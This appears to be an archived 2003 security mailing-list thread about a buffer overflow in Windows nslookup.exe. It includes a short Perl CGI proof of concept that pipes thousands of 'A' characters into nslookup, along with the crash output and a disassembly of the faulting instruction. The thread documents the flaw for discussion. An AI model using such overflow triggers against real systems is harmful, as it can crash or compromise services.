==begin silly.cgi #!perl -w use strict; print "Content-type: text/html\n\n"; open(NSLOOKUP,"|nslookup.exe") || die "Could not open nslookup.exe (path?)"; print NSLOOKUP "A" x 6489; close(NSLOOKUP); ==end silly.cgi MSDE: Unhandled exception at 0x01004d65 in NSLOOKUP.EXE: 0xC0000005: Access violation writing location 0x0103e000. 01004D5D cmp esi,100F770h 01004D63 je 01004D6F ---> 01004D65 mov dword ptr [edi],esi 01004D67 add edi,4 01004D6A jmp 01004C37 01004D65 = 16797029 ,_____________________________________________________, \ Ryan Yagatich supportat_private \ / Pantek Incorporated (877) LINUX-FIX / \ http://www.pantek.com/security (440) 519-1802 \ / Are your networks secure? Are you certain? / \___A4536371BF88C57DB181799D00BCA331E6AD909D297C3493___\ On Thu, 20 Mar 2003, Blue Boar wrote: >Patrick Webster wrote: >> Can you do anything interesting with this?: >> >> C:\>nslookup >> Default Server: dns.server.net >> Address: 111.222.333.444 >> >> >>>AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA >> >> AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA >> AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA >> AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA >> >> Gives error: memory can't be "read" - 0x414141 (aka A). > >If you have to manually type all the A's, then probably not. Maybe if >someone did something silly like make a CGI script that calls nslookup.exe >directly with user input. > >What OS are you testing on? It looks like it's fixed in XP: > >C:\winxp\system32>nslookup >Default Server: dns1.snfcca.sbcglobal.net >Address: 206.13.28.12 > > > >AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA >AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA >AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA >AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA >*** Input is too long > > > > > BB >
This archive was generated by hypermail 2b30 : Fri Mar 21 2003 - 10:51:11 PST